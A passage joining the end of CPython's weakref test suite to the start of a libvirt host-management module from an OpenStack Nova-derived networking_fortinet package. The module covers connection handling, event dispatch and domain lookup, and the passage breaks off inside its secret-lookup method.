try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import sys
import threading
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
import six
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import rpc
from nova import utils
from networking_fortinet.virt import event as virtevent
from networking_fortinet.virt.libvirt import config as vconfig
from networking_fortinet.virt.libvirt import guest as libvirt_guest
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("queue" if six.PY3 else "Queue")
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when a event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version, utils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
utils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
# TODO(sahid): needs to be private
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
Attempt to lookup the libvirt domain objects
corresponding to the Nova instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise a exception.NovaException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def get_guest(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
"""
return libvirt_guest.Guest(
self.get_domain(instance))
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES')
and self._caps.host.cpu.model is not None):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: %(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
try:
conn = self.get_connection()
